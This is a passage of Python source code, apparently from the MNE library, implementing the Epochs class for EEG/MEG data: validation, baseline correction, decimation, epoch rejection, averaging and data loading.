'chronologically ordered.', RuntimeWarning)
if n_events > 0:
logger.info('%d matching events found' % n_events)
else:
raise ValueError('No desired events found.')
else:
self.drop_log = tuple()
self.selection = np.array([], int)
self.metadata = metadata
# do not set self.events here, let subclass do it
if (detrend not in [None, 0, 1]) or isinstance(detrend, bool):
raise ValueError('detrend must be None, 0, or 1')
self.detrend = detrend
self._raw = raw
info._check_consistency()
self.picks = _picks_to_idx(info, picks, none='all', exclude=(),
allow_empty=False)
self.info = pick_info(info, self.picks)
del info
self._current = 0
if data is None:
self.preload = False
self._data = None
self._do_baseline = True
else:
assert decim == 1
if data.ndim != 3 or data.shape[2] != \
round((tmax - tmin) * self.info['sfreq']) + 1:
raise RuntimeError('bad data shape')
if data.shape[0] != len(self.events):
raise ValueError(
'The number of epochs and the number of events must match')
self.preload = True
self._data = data
self._do_baseline = False
self._offset = None
if tmin > tmax:
raise ValueError('tmin has to be less than or equal to tmax')
# Handle times
sfreq = float(self.info['sfreq'])
start_idx = int(round(tmin * sfreq))
self._raw_times = np.arange(start_idx,
int(round(tmax * sfreq)) + 1) / sfreq
self._set_times(self._raw_times)
# check reject_tmin and reject_tmax
if reject_tmin is not None:
if (np.isclose(reject_tmin, tmin)):
# adjust for potential small deviations due to sampling freq
reject_tmin = self.tmin
elif reject_tmin < tmin:
raise ValueError(f'reject_tmin needs to be None or >= tmin '
f'(got {reject_tmin})')
if reject_tmax is not None:
if (np.isclose(reject_tmax, tmax)):
# adjust for potential small deviations due to sampling freq
reject_tmax = self.tmax
elif reject_tmax > tmax:
raise ValueError(f'reject_tmax needs to be None or <= tmax '
f'(got {reject_tmax})')
if (reject_tmin is not None) and (reject_tmax is not None):
if reject_tmin >= reject_tmax:
raise ValueError(f'reject_tmin ({reject_tmin}) needs to be '
f' < reject_tmax ({reject_tmax})')
self.reject_tmin = reject_tmin
self.reject_tmax = reject_tmax
# decimation
self._decim = 1
self.decimate(decim)
# baseline correction: replace `None` tuple elements with actual times
self.baseline = _check_baseline(baseline, times=self.times,
sfreq=self.info['sfreq'])
if self.baseline is not None and self.baseline != baseline:
logger.info(f'Setting baseline interval to '
f'[{self.baseline[0]}, {self.baseline[1]}] sec')
logger.info(_log_rescale(self.baseline))
# setup epoch rejection
self.reject = None
self.flat = None
self._reject_setup(reject, flat)
# do the rest
valid_proj = [True, 'delayed', False]
if proj not in valid_proj:
raise ValueError('"proj" must be one of %s, not %s'
% (valid_proj, proj))
if proj == 'delayed':
self._do_delayed_proj = True
logger.info('Entering delayed SSP mode.')
else:
self._do_delayed_proj = False
activate = False if self._do_delayed_proj else proj
self._projector, self.info = setup_proj(self.info, False,
activate=activate)
if preload_at_end:
assert self._data is None
assert self.preload is False
self.load_data() # this will do the projection
elif proj is True and self._projector is not None and data is not None:
# let's make sure we project if data was provided and proj
# requested
# we could do this with np.einsum, but iteration should be
# more memory safe in most instances
for ii, epoch in enumerate(self._data):
self._data[ii] = np.dot(self._projector, epoch)
self._filename = str(filename) if filename is not None else filename
if raw_sfreq is None:
raw_sfreq = self.info['sfreq']
self._raw_sfreq = raw_sfreq
self._check_consistency()
self.set_annotations(annotations)
def _check_consistency(self):
"""Check invariants of epochs object."""
if hasattr(self, 'events'):
assert len(self.selection) == len(self.events)
assert len(self.drop_log) >= len(self.events)
assert len(self.selection) == sum(
(len(dl) == 0 for dl in self.drop_log))
assert hasattr(self, '_times_readonly')
assert not self.times.flags['WRITEABLE']
assert isinstance(self.drop_log, tuple)
assert all(isinstance(log, tuple) for log in self.drop_log)
assert all(isinstance(s, str) for log in self.drop_log for s in log)
def reset_drop_log_selection(self):
"""Reset the drop_log and selection entries.
This method will simplify ``self.drop_log`` and ``self.selection``
so that they are meaningless (tuple of empty tuples and increasing
integers, respectively). This can be useful when concatenating
many Epochs instances, as ``drop_log`` can accumulate many entries
which can become problematic when saving.
"""
self.selection = np.arange(len(self.events))
self.drop_log = (tuple(),) * len(self.events)
self._check_consistency()
def load_data(self):
"""Load the data if not already preloaded.
Returns
-------
epochs : instance of Epochs
The epochs object.
Notes
-----
This function operates in-place.
.. versionadded:: 0.10.0
"""
if self.preload:
return self
self._data = self._get_data()
self.preload = True
self._do_baseline = False
self._decim_slice = slice(None, None, None)
self._decim = 1
self._raw_times = self.times
assert self._data.shape[-1] == len(self.times)
self._raw = None # shouldn't need it anymore
return self
@verbose
def decimate(self, decim, offset=0, verbose=None):
"""Decimate the epochs.
Parameters
----------
%(decim)s
%(decim_offset)s
%(verbose)s
Returns
-------
epochs : instance of Epochs
The decimated Epochs object.
See Also
--------
mne.Evoked.decimate
mne.Epochs.resample
mne.io.Raw.resample
Notes
-----
%(decim_notes)s
If ``decim`` is 1, this method does not copy the underlying data.
.. versionadded:: 0.10.0
References
----------
.. footbibliography::
"""
decim, offset, new_sfreq = _check_decim(self.info, decim, offset)
start_idx = int(round(-self._raw_times[0] * (self.info['sfreq'] *
self._decim)))
self._decim *= decim
i_start = start_idx % self._decim + offset
decim_slice = slice(i_start, None, self._decim)
with self.info._unlock():
self.info['sfreq'] = new_sfreq
if self.preload:
if decim != 1:
self._data = self._data[:, :, decim_slice].copy()
self._raw_times = self._raw_times[decim_slice].copy()
else:
self._data = np.ascontiguousarray(self._data)
self._decim_slice = slice(None)
self._decim = 1
else:
self._decim_slice = decim_slice
self._set_times(self._raw_times[self._decim_slice])
return self
@verbose
def apply_baseline(self, baseline=(None, 0), *, verbose=None):
"""Baseline correct epochs.
Parameters
----------
%(baseline_epochs)s
Defaults to ``(None, 0)``, i.e. beginning of the the data until
time point zero.
%(verbose)s
Returns
-------
epochs : instance of Epochs
The baseline-corrected Epochs object.
Notes
-----
Baseline correction can be done multiple times, but can never be
reverted once the data has been loaded.
.. versionadded:: 0.10.0
"""
baseline = _check_baseline(baseline, times=self.times,
sfreq=self.info['sfreq'])
if self.preload:
if self.baseline is not None and baseline is None:
raise RuntimeError('You cannot remove baseline correction '
'from preloaded data once it has been '
'applied.')
self._do_baseline = True
picks = self._detrend_picks
rescale(self._data, self.times, baseline, copy=False, picks=picks)
self._do_baseline = False
else: # logging happens in "rescale" in "if" branch
logger.info(_log_rescale(baseline))
# For EpochsArray and Epochs, this is already True:
# assert self._do_baseline is True
# ... but for EpochsFIF it's not, so let's set it explicitly
self._do_baseline = True
self.baseline = baseline
return self
def _reject_setup(self, reject, flat):
"""Set self._reject_time and self._channel_type_idx."""
idx = channel_indices_by_type(self.info)
reject = deepcopy(reject) if reject is not None else dict()
flat = deepcopy(flat) if flat is not None else dict()
for rej, kind in zip((reject, flat), ('reject', 'flat')):
if not isinstance(rej, dict):
raise TypeError('reject and flat must be dict or None, not %s'
% type(rej))
bads = set(rej.keys()) - set(idx.keys())
if len(bads) > 0:
raise KeyError('Unknown channel types found in %s: %s'
% (kind, bads))
for key in idx.keys():
# don't throw an error if rejection/flat would do nothing
if len(idx[key]) == 0 and (np.isfinite(reject.get(key, np.inf)) or
flat.get(key, -1) >= 0):
# This is where we could eventually add e.g.
# self.allow_missing_reject_keys check to allow users to
# provide keys that don't exist in data
raise ValueError("No %s channel found. Cannot reject based on "
"%s." % (key.upper(), key.upper()))
# check for invalid values
for rej, kind in zip((reject, flat), ('Rejection', 'Flat')):
for key, val in rej.items():
if val is None or val < 0:
raise ValueError('%s value must be a number >= 0, not "%s"'
% (kind, val))
# now check to see if our rejection and flat are getting more
# restrictive
old_reject = self.reject if self.reject is not None else dict()
old_flat = self.flat if self.flat is not None else dict()
bad_msg = ('{kind}["{key}"] == {new} {op} {old} (old value), new '
'{kind} values must be at least as stringent as '
'previous ones')
# copy thresholds for channel types that were used previously, but not
# passed this time
for key in set(old_reject) - set(reject):
reject[key] = old_reject[key]
# make sure new thresholds are at least as stringent as the old ones
for key in reject:
if key in old_reject and reject[key] > old_reject[key]:
raise ValueError(
bad_msg.format(kind='reject', key=key, new=reject[key],
old=old_reject[key], op='>'))
# same for flat thresholds
for key in set(old_flat) - set(flat):
flat[key] = old_flat[key]
for key in flat:
if key in old_flat and flat[key] < old_flat[key]:
raise ValueError(
bad_msg.format(kind='flat', key=key, new=flat[key],
old=old_flat[key], op='<'))
# after validation, set parameters
self._bad_dropped = False
self._channel_type_idx = idx
self.reject = reject if len(reject) > 0 else None
self.flat = flat if len(flat) > 0 else None
if (self.reject_tmin is None) and (self.reject_tmax is None):
self._reject_time = None
else:
if self.reject_tmin is None:
reject_imin = None
else:
idxs = np.nonzero(self.times >= self.reject_tmin)[0]
reject_imin = idxs[0]
if self.reject_tmax is None:
reject_imax = None
else:
idxs = np.nonzero(self.times <= self.reject_tmax)[0]
reject_imax = idxs[-1]
self._reject_time = slice(reject_imin, reject_imax)
@verbose # verbose is used by mne-realtime
def _is_good_epoch(self, data, verbose=None):
"""Determine if epoch is good."""
if isinstance(data, str):
return False, (data,)
if data is None:
return False, ('NO_DATA',)
n_times = len(self.times)
if data.shape[1] < n_times:
# epoch is too short ie at the end of the data
return False, ('TOO_SHORT',)
if self.reject is None and self.flat is None:
return True, None
else:
if self._reject_time is not None:
data = data[:, self._reject_time]
return _is_good(data, self.ch_names, self._channel_type_idx,
self.reject, self.flat, full_report=True,
ignore_chs=self.info['bads'])
@verbose
def _detrend_offset_decim(self, epoch, picks, verbose=None):
"""Aux Function: detrend, baseline correct, offset, decim.
Note: operates inplace
"""
if (epoch is None) or isinstance(epoch, str):
return epoch
# Detrend
if self.detrend is not None:
# We explicitly detrend just data channels (not EMG, ECG, EOG which
# are processed by baseline correction)
use_picks = _pick_data_channels(self.info, exclude=())
epoch[use_picks] = detrend(epoch[use_picks], self.detrend, axis=1)
# Baseline correct
if self._do_baseline:
rescale(
epoch, self._raw_times, self.baseline, picks=picks, copy=False,
verbose=False)
# Decimate if necessary (i.e., epoch not preloaded)
epoch = epoch[:, self._decim_slice]
# handle offset
if self._offset is not None:
epoch += self._offset
return epoch
def iter_evoked(self, copy=False):
"""Iterate over epochs as a sequence of Evoked objects.
The Evoked objects yielded will each contain a single epoch (i.e., no
averaging is performed).
This method resets the object iteration state to the first epoch.
Parameters
----------
copy : bool
If False copies of data and measurement info will be omitted
to save time.
"""
self.__iter__()
while True:
try:
out = self.__next__(True)
except StopIteration:
break
data, event_id = out
tmin = self.times[0]
info = self.info
if copy:
info = deepcopy(self.info)
data = data.copy()
yield EvokedArray(data, info, tmin, comment=str(event_id))
def subtract_evoked(self, evoked=None):
"""Subtract an evoked response from each epoch.
Can be used to exclude the evoked response when analyzing induced
activity, see e.g. [1]_.
Parameters
----------
evoked : instance of Evoked | None
The evoked response to subtract. If None, the evoked response
is computed from Epochs itself.
Returns
-------
self : instance of Epochs
The modified instance (instance is also modified inplace).
References
----------
.. [1] David et al. "Mechanisms of evoked and induced responses in
MEG/EEG", NeuroImage, vol. 31, no. 4, pp. 1580-1591, July 2006.
"""
logger.info('Subtracting Evoked from Epochs')
if evoked is None:
picks = _pick_data_channels(self.info, exclude=[])
evoked = self.average(picks)
# find the indices of the channels to use
picks = pick_channels(evoked.ch_names, include=self.ch_names)
# make sure the omitted channels are not data channels
if len(picks) < len(self.ch_names):
sel_ch = [evoked.ch_names[ii] for ii in picks]
diff_ch = list(set(self.ch_names).difference(sel_ch))
diff_idx = [self.ch_names.index(ch) for ch in diff_ch]
diff_types = [channel_type(self.info, idx) for idx in diff_idx]
bad_idx = [diff_types.index(t) for t in diff_types if t in
_DATA_CH_TYPES_SPLIT]
if len(bad_idx) > 0:
bad_str = ', '.join([diff_ch[ii] for ii in bad_idx])
raise ValueError('The following data channels are missing '
'in the evoked response: %s' % bad_str)
logger.info(' The following channels are not included in the '
'subtraction: %s' % ', '.join(diff_ch))
# make sure the times match
if (len(self.times) != len(evoked.times) or
np.max(np.abs(self.times - evoked.times)) >= 1e-7):
raise ValueError('Epochs and Evoked object do not contain '
'the same time points.')
# handle SSPs
if not self.proj and evoked.proj:
warn('Evoked has SSP applied while Epochs has not.')
if self.proj and not evoked.proj:
evoked = evoked.copy().apply_proj()
# find the indices of the channels to use in Epochs
ep_picks = [self.ch_names.index(evoked.ch_names[ii]) for ii in picks]
# do the subtraction
if self.preload:
self._data[:, ep_picks, :] -= evoked.data[picks][None, :, :]
else:
if self._offset is None:
self._offset = np.zeros((len(self.ch_names), len(self.times)),
dtype=np.float64)
self._offset[ep_picks] -= evoked.data[picks]
logger.info('[done]')
return self
@fill_doc
def average(self, picks=None, method="mean", by_event_type=False):
"""Compute an average over epochs.
Parameters
----------
%(picks_all_data)s
method : str | callable
How to combine the data. If "mean"/"median", the mean/median
are returned.
Otherwise, must be a callable which, when passed an array of shape
(n_epochs, n_channels, n_time) returns an array of shape
(n_channels, n_time).
Note that due to file type limitations, the kind for all
these will be "average".
%(by_event_type)s
Returns
-------
%(by_event_type_returns_average)s
Notes
-----
Computes an average of all epochs in the instance, even if
they correspond to different conditions. To average by condition,
do ``epochs[condition].average()`` for each condition separately.
When picks is None and epochs contain only ICA channels, no channels
are selected, resulting in an error. This is because ICA channels
are not considered data channels (they are of misc type) and only data
channels are selected when picks is None.
The ``method`` parameter allows e.g. robust averaging.
For example, one could do:
>>> from scipy.stats import trim_mean # doctest:+SKIP
>>> trim = lambda x: trim_mean(x, 0.1, axis=0) # doctest:+SKIP
>>> epochs.average(method=trim) # doctest:+SKIP
This would compute the trimmed mean.
"""
if by_event_type:
evokeds = list()
for event_type in self.event_id.keys():
ev = self[event_type]._compute_aggregate(picks=picks,
mode=method)
ev.comment = event_type
evokeds.append(ev)
else:
evokeds = self._compute_aggregate(picks=picks, mode=method)
return evokeds
@fill_doc
def standard_error(self, picks=None, by_event_type=False):
"""Compute standard error over epochs.
Parameters
----------
%(picks_all_data)s
%(by_event_type)s
Returns
-------
%(by_event_type_returns_stderr)s
"""
return self.average(picks=picks, method="std",
by_event_type=by_event_type)
def _compute_aggregate(self, picks, mode='mean'):
"""Compute the mean, median, or std over epochs and return Evoked."""
# if instance contains ICA channels they won't be included unless picks
# is specified
if picks is None:
check_ICA = [x.startswith('ICA') for x in self.ch_names]
if np.all(check_ICA):
raise TypeError('picks must be specified (i.e. not None) for '
'ICA channel data')
elif np.any(check_ICA):
warn('ICA channels will not be included unless explicitly '
'selected in picks')
n_channels = len(self.ch_names)
n_times = len(self.times)
if self.preload:
n_events = len(self.events)
fun = _check_combine(mode, valid=('mean', 'median', 'std'))
data = fun(self._data)
assert len(self.events) == len(self._data)
if data.shape != self._data.shape[1:]:
raise RuntimeError(
'You passed a function that resulted n data of shape {}, '
'but it should be {}.'.format(
data.shape, self._data.shape[1:]))
else:
if mode not in {"mean", "std"}:
raise ValueError("If data are not preloaded, can only compute "
"mean or standard deviation.")
data = np.zeros((n_channels, n_times))
n_events = 0
for e in self:
if np.iscomplexobj(e):
data = data.astype(np.complex128)
data += e
n_events += 1
if n_events > 0:
data /= n_events
else:
data.fill(np.nan)
# convert to stderr if requested, could do in one pass but do in
# two (slower) in case there are large numbers
if mode == "std":
data_mean = data.copy()
data.fill(0.)
for e in self:
data += (e - data_mean) ** 2
data = np.sqrt(data / n_events)
if mode == "std":
kind = 'standard_error'
data /= np.sqrt(n_events)
else:
kind = "average"
return self._evoked_from_epoch_data(data, self.info, picks, n_events,
kind, self._name)
@property
def _name(self):
"""Give a nice string representation based on event ids."""
if len(self.event_id) == 1:
comment = next(iter(self.event_id.keys()))
else:
count = Counter(self.events[:, 2])
comments = list()
for key, value in self.event_id.items():
comments.append('%.2f × %s' % (
float(count[value]) / len(self.events), key))
comment = ' + '.join(comments)
return comment
def _evoked_from_epoch_data(self, data, info, picks, n_events, kind,
comment):
"""Create an evoked object from epoch data."""
info = deepcopy(info)
# don't apply baseline correction; we'll set evoked.baseline manually
evoked = EvokedArray(data, info, tmin=self.times[0], comment=comment,
nave=n_events, kind=kind, baseline=None)
evoked.baseline = self.baseline
# the above constructor doesn't recreate the times object precisely
# due to numerical precision issues
evoked.times = self.times.copy()
# pick channels
picks = _picks_to_idx(self.info, picks, 'data_or_ica', ())
ch_names = [evoked.ch_names[p] for p in picks]
evoked.pick_channels(ch_names)
if len(evoked.info['ch_names']) == 0:
raise ValueError('No data channel found when averaging.')
if evoked.nave < 1:
warn('evoked object is empty (based on less than 1 epoch)')
return evoked
@property
def ch_names(self):
"""Channel names."""
return self.info['ch_names']
@copy_function_doc_to_method_doc(plot_epochs)
def plot(self, picks=None, scalings=None, n_epochs=20, n_channels=20,
title=None, events=None, event_color=None,
order=None, show=True, block=False, decim='auto', noise_cov=None,
butterfly=False, show_scrollbars=True, show_scalebars=True,
epoch_colors=None, event_id=None, group_by='type'):
return plot_epochs(self, picks=picks, scalings=scalings,
n_epochs=n_epochs, n_channels=n_channels,
title=title, events=events, event_color=event_color,
order=order, show=show, block=block, decim=decim,
noise_cov=noise_cov, butterfly=butterfly,
show_scrollbars=show_scrollbars,
show_scalebars=show_scalebars,
epoch_colors=epoch_colors, event_id=event_id,
group_by=group_by)
@copy_function_doc_to_method_doc(plot_epochs_psd)
def plot_psd(self, fmin=0, fmax=np.inf, tmin=None, tmax=None,
proj=False, bandwidth=None, adaptive=False, low_bias=True,
normalization='length', picks=None, ax=None, color='black',
xscale='linear', area_mode='std', area_alpha=0.33,
dB=True, estimate='auto', show=True, n_jobs=1,
average=False, line_alpha=None, spatial_colors=True,
sphere=None, exclude='bads', verbose=None):
return plot_epochs_psd(self, fmin=fmin, fmax=fmax, tmin=tmin,
tmax=tmax, proj=proj, bandwidth=bandwidth,
adaptive=adaptive, low_bias=low_bias,
normalization=normalization, picks=picks, ax=ax,
color=color, xscale=xscale, area_mode=area_mode,
area_alpha=area_alpha, dB=dB, estimate=estimate,
show=show, n_jobs=n_jobs, average=average,
line_alpha=line_alpha,
spatial_colors=spatial_colors, sphere=sphere,
exclude=exclude, verbose=verbose)
@copy_function_doc_to_method_doc(plot_epochs_psd_topomap)
def plot_psd_topomap(self, bands=None, tmin=None,
tmax=None, proj=False, bandwidth=None, adaptive=False,
low_bias=True, normalization='length', ch_type=None,
cmap=None, agg_fun=None, dB=True,
n_jobs=1, normalize=False, cbar_fmt='auto',
outlines='head', axes=None, show=True,
sphere=None, vlim=(None, None), verbose=None):
return plot_epochs_psd_topomap(
self, bands=bands, tmin=tmin, tmax=tmax,
proj=proj, bandwidth=bandwidth, adaptive=adaptive,
low_bias=low_bias, normalization=normalization, ch_type=ch_type,
cmap=cmap, agg_fun=agg_fun, dB=dB, n_jobs=n_jobs,
normalize=normalize, cbar_fmt=cbar_fmt, outlines=outlines,
axes=axes, show=show, sphere=sphere, vlim=vlim, verbose=verbose)
@copy_function_doc_to_method_doc(plot_topo_image_epochs)
def plot_topo_image(self, layout=None, sigma=0., vmin=None, vmax=None,
colorbar=None, order=None, cmap='RdBu_r',
layout_scale=.95, title=None, scalings=None,
border='none', fig_facecolor='k', fig_background=None,
font_color='w', show=True):
return plot_topo_image_epochs(
self, layout=layout, sigma=sigma, vmin=vmin, vmax=vmax,
colorbar=colorbar, order=order, cmap=cmap,
layout_scale=layout_scale, title=title, scalings=scalings,
border=border, fig_facecolor=fig_facecolor,
fig_background=fig_background, font_color=font_color, show=show)
@verbose
def drop_bad(self, reject='existing', flat='existing', verbose=None):
"""Drop bad epochs without retaining the epochs data.
Should be used before slicing operations.
.. warning:: This operation is slow since all epochs have to be read
from disk. To avoid reading epochs from disk multiple
times, use :meth:`mne.Epochs.load_data()`.
.. note:: To constrain the time period used for estimation of signal
quality, set ``epochs.reject_tmin`` and
``epochs.reject_tmax``, respectively.
Parameters
----------
%(reject_drop_bad)s
%(flat_drop_bad)s
%(verbose)s
Returns
-------
epochs : instance of Epochs
The epochs with bad epochs dropped. Operates in-place.
Notes
-----
Dropping bad epochs can be done multiple times with different
``reject`` and ``flat`` parameters. However, once an epoch is
dropped, it is dropped forever, so if more lenient thresholds may
subsequently be applied, `epochs.copy <mne.Epochs.copy>` should be
used.
"""
if reject == 'existing':
if flat == 'existing' and self._bad_dropped:
return
reject = self.reject
if flat == 'existing':
flat = self.flat
if any(isinstance(rej, str) and rej != 'existing' for
rej in (reject, flat)):
raise ValueError('reject and flat, if strings, must be "existing"')
self._reject_setup(reject, flat)
self._get_data(out=False, verbose=verbose)
return self
def drop_log_stats(self, ignore=('IGNORED',)):
"""Compute the channel stats based on a drop_log from Epochs.
Parameters
----------
ignore : list
The drop reasons to ignore.
Returns
-------
perc : float
Total percentage of epochs dropped.
See Also
--------
plot_drop_log
"""
return _drop_log_stats(self.drop_log, ignore)
@copy_function_doc_to_method_doc(plot_drop_log)
def plot_drop_log(self, threshold=0, n_max_plot=20, subject=None,
color=(0.9, 0.9, 0.9), width=0.8, ignore=('IGNORED',),
show=True):
if not self._bad_dropped:
raise ValueError("You cannot use plot_drop_log since bad "
"epochs have not yet been dropped. "
"Use epochs.drop_bad().")
return plot_drop_log(self.drop_log, threshold, n_max_plot, subject,
color=color, width=width, ignore=ignore,
show=show)
@copy_function_doc_to_method_doc(plot_epochs_image)
def plot_image(self, picks=None, sigma=0., vmin=None, vmax=None,
colorbar=True, order=None, show=True, units=None,
scalings=None, cmap=None, fig=None, axes=None,
overlay_times=None, combine=None, group_by=None,
evoked=True, ts_args=None, title=None, clear=False):
return plot_epochs_image(self, picks=picks, sigma=sigma, vmin=vmin,
vmax=vmax, colorbar=colorbar, order=order,
show=show, units=units, scalings=scalings,
cmap=cmap, fig=fig, axes=axes,
overlay_times=overlay_times, combine=combine,
group_by=group_by, evoked=evoked,
ts_args=ts_args, title=title, clear=clear)
@verbose
def drop(self, indices, reason='USER', verbose=None):
"""Drop epochs based on indices or boolean mask.
.. note:: The indices refer to the current set of undropped epochs
rather than the complete set of dropped and undropped epochs.
They are therefore not necessarily consistent with any
external indices (e.g., behavioral logs). To drop epochs
based on external criteria, do not use the ``preload=True``
flag when constructing an Epochs object, and call this
method before calling the :meth:`mne.Epochs.drop_bad` or
:meth:`mne.Epochs.load_data` methods.
Parameters
----------
indices : array of int or bool
Set epochs to remove by specifying indices to remove or a boolean
mask to apply (where True values get removed). Events are
correspondingly modified.
reason : str
Reason for dropping the epochs ('ECG', 'timeout', 'blink' etc).
Default: 'USER'.
%(verbose)s
Returns
-------
epochs : instance of Epochs
The epochs with indices dropped. Operates in-place.
"""
indices = np.atleast_1d(indices)
if indices.ndim > 1:
raise ValueError("indices must be a scalar or a 1-d array")
if indices.dtype == bool:
indices = np.where(indices)[0]
try_idx = np.where(indices < 0, indices + len(self.events), indices)
out_of_bounds = (try_idx < 0) | (try_idx >= len(self.events))
if out_of_bounds.any():
first = indices[out_of_bounds][0]
raise IndexError("Epoch index %d is out of bounds" % first)
keep = np.setdiff1d(np.arange(len(self.events)), try_idx)
self._getitem(keep, reason, copy=False, drop_event_id=False)
count = len(try_idx)
logger.info('Dropped %d epoch%s: %s' %
(count, _pl(count), ', '.join(map(str, np.sort(try_idx)))))
return self
def _get_epoch_from_raw(self, idx, verbose=None):
"""Get a given epoch from disk."""
raise NotImplementedError
def _project_epoch(self, epoch):
"""Process a raw epoch based on the delayed param."""
# whenever requested, the first epoch is being projected.
if (epoch is None) or isinstance(epoch, str):
# can happen if t < 0 or reject based on annotations
return epoch
proj = self._do_delayed_proj or self.proj
if self._projector is not None and proj is True:
epoch = np.dot(self._projector, epoch)
return epoch
@verbose
def _get_data(self, out=True, picks=None, item=None, *, units=None,
tmin=None, tmax=None, verbose=None):
"""Load all data, dropping bad epochs along the way.
Parameters
----------
out : bool
Return the data. Setting this to False is used to reject bad
epochs without caching all the data, which saves memory.
%(picks_all)s
item : slice | array-like | str | list | None
See docstring of get_data method.
%(units)s
tmin : int | float | None
Start time of data to get in seconds.
tmax : int | float | None
End time of data to get in seconds.
%(verbose)s
"""
start, stop = self._handle_tmin_tmax(tmin, tmax)
if item is None:
item = slice(None)
elif not self._bad_dropped:
raise ValueError(
'item must be None in epochs.get_data() unless bads have been '
'dropped. Consider using epochs.drop_bad().')
select = self._item_to_select(item) # indices or slice
use_idx = np.arange(len(self.events))[select]
n_events = len(use_idx)
# in case there are no good events
if self.preload:
# we will store our result in our existing array
data = self._data
else:
# we start out with an empty array, allocate only if necessary
data = np.empty((0, len(self.info['ch_names']), len(self.times)))
msg = (f'for {n_events} events and {len(self._raw_times)} '
'original time points')
if self._decim > 1:
msg += ' (prior to decimation)'
if getattr(self._raw, "preload", False):
logger.info(f'Using data from preloaded Raw {msg} ...')
else:
logger.info(f'Loading data {msg} ...')
orig_picks = picks
if orig_picks is None:
picks = _picks_to_idx(self.info, picks, "all", exclude=())
else:
picks = _picks_to_idx(self.info, picks)
# handle units param only if we are going to return data (out==True)
if (units is not None) and out:
ch_factors = _get_ch_factors(self, units, picks)
if self._bad_dropped:
if not out:
return
if self.preload:
data = data[select]
if orig_picks is not None:
data = data[:, picks]
if units is not None:
data *= ch_factors[:, np.newaxis]
if start != 0 or stop != self.times.size:
data = data[..., start:stop]
return data
# we need to load from disk, drop, and return data
detrend_picks = self._detrend_picks
for ii, idx in enumerate(use_idx):
# faster to pre-allocate memory here
epoch_noproj = self._get_epoch_from_raw(idx)
epoch_noproj = self._detrend_offset_decim(
epoch_noproj, detrend_picks)
if self._do_delayed_proj:
epoch_out = epoch_noproj
else:
epoch_out = self._project_epoch(epoch_noproj)
if ii == 0:
data = np.empty((n_events, len(self.ch_names),
len(self.times)), dtype=epoch_out.dtype)
data[ii] = epoch_out
else:
# bads need to be dropped, this might occur after a preload
# e.g., when calling drop_bad w/new params
good_idx = []
n_out = 0
drop_log = list(self.drop_log)
assert n_events == len(self.selection)
if not self.preload:
detrend_picks = self._detrend_picks
for idx, sel in enumerate(self.selection):
if self.preload: # from memory
if self._do_delayed_proj:
epoch_noproj = self._data[idx]
epoch = self._project_epoch(epoch_noproj)
else:
epoch_noproj = None
epoch = self._data[idx]
else: # from disk
epoch_noproj = self._get_epoch_from_raw(idx)
epoch_noproj = self._detrend_offset_decim(
epoch_noproj, detrend_picks)
epoch = self._project_epoch(epoch_noproj)
epoch_out = epoch_noproj if self._do_delayed_proj else epoch
is_good, bad_tuple = self._is_good_epoch(
epoch, verbose=verbose)
if not is_good:
assert isinstance(bad_tuple, tuple)
assert all(isinstance(x, str) for x in bad_tuple)
drop_log[sel] = drop_log[sel] + bad_tuple
continue
good_idx.append(idx)
# store the epoch if there is a reason to (output or update)
if out or self.preload:
# faster to pre-allocate, then trim as necessary
if n_out == 0 and not self.preload:
data = np.empty((n_events, epoch_out.shape[0],
epoch_out.shape[1]),
dtype=epoch_out.dtype, order='C')
data[n_out] = epoch_out
n_out += 1
self.drop_log = tuple(drop_log)
del drop_log
self._bad_dropped = True
logger.info("%d bad epochs dropped" % (n_events - len(good_idx)))
# adjust the data size if there is a reason to (output or update)
if out or self.preload:
if data.flags['OWNDATA'] and data.flags['C_CONTIGUOUS']:
data.resize((n_out,) + data.shape[1:], refcheck=False)
else:
data = data[:n_out]
if self.preload:
self._data = data
# Now update our properties (excepd data, which is already fixed)
self._getitem(good_idx, None, copy=False, drop_event_id=False,
select_data=False)
if out:
if orig_picks is not None:
data = data[:, picks]
if units is not None:
data *= ch_factors[:, np.newaxis]
if start != 0 or stop != self.times.size:
data = data[..., start:stop]
return data
else:
return None
@property
def _detrend_picks(self):
if self._do_baseline:
return _pick_data_channels(
self.info, with_ref_meg=True, with_aux=True, exclude=())
else:
return []
@fill_doc
def get_data(self, picks=None, item=None, units=None, tmin=None,
tmax=None):
"""Get all epochs as a 3D array.
Parameters
----------
%(picks_all)s
item : slice | array-like | str | list | None
The items to get. See :meth:`mne.Epochs.__getitem__` for
a description of valid options. This can be substantially faster
for obtaining an ndarray than :meth:`~mne.Epochs.__getitem__`
for repeated access on large Epochs objects.
None (default) is an alias for ``slice(None)``.
.. versionadded:: 0.20
%(units)s
.. versionadded:: 0.24
tmin : int | float | None
Start time of data to get in seconds.
.. versionadded:: 0.24.0
tmax : int | float | None
End time of data to get in seconds.
.. versionadded:: 0.24.0
Returns
-------
data : array of shape (n_epochs, n_channels, n_times)
A view on epochs data.
"""
return self._get_data(picks=picks, item=item, units=units, tmin=tmin,
tmax=tmax)
@verbose
def apply_function(self, fun, picks=None, dtype=None, n_jobs=1,
channel_wise=True, verbose=None, **kwargs):
"""Apply a function to a subset of channels.
%(applyfun_summary_epochs)s
Parameters
----------
%(applyfun_fun)s
%(picks_all_data_noref)s
%(applyfun_dtype)s
%(n_jobs)s
%(applyfun_chwise_epo)s
%(verbose)s
%(kwarg_fun)s
Returns
-------
self : instance of Epochs
The epochs object with transformed data.
"""
_check_preload(self, 'epochs.apply_function')
picks = _picks_to_idx(self.info, picks, exclude=(), with_ref_meg=False)
if not callable(fun):
raise ValueError('fun needs to be a function')
data_in = self._data
if dtype is not None and dtype != self._data.dtype:
self._data = self._data.astype(dtype)
if channel_wise:
if n_jobs == 1:
_fun = partial(_check_fun, fun, **kwargs)
# modify data inplace to save memory
for idx in picks:
self._data[:, idx, :] = np.apply_along_axis(
_fun, -1, data_in[:, idx, :])
else:
# use parallel function
parallel, p_fun, _ = parallel_func(_check_fun, n_jobs)
data_picks_new = parallel(p_fun(
fun, data_in[:, p, :], **kwargs) for p in picks)
for pp, p in enumerate(picks):
self._data[:, p, :] = data_picks_new[pp]
else:
self._data = _check_fun(fun, data_in, **kwargs)
return self
@property
def times(self):
"""Time vector in seconds."""
return self._times_readonly
def _set_times(self, times):
"""Set self._times_readonly (and make it read only)."""
# naming used to indicate that it shouldn't be
# changed directly, but rather via this method
self._times_readonly = times.copy()
self._times_readonly.flags['WRITEABLE'] = False
@property
def tmin(self):
"""First time point."""
return self.times[0]
@property
def filename(self):
"""The filename."""
return self._filename
@property
def tmax(self):
"""Last time point."""
return self.times[-1]
def __repr__(self):
"""Build string representation."""
s = ' %s events ' % len(self.events)
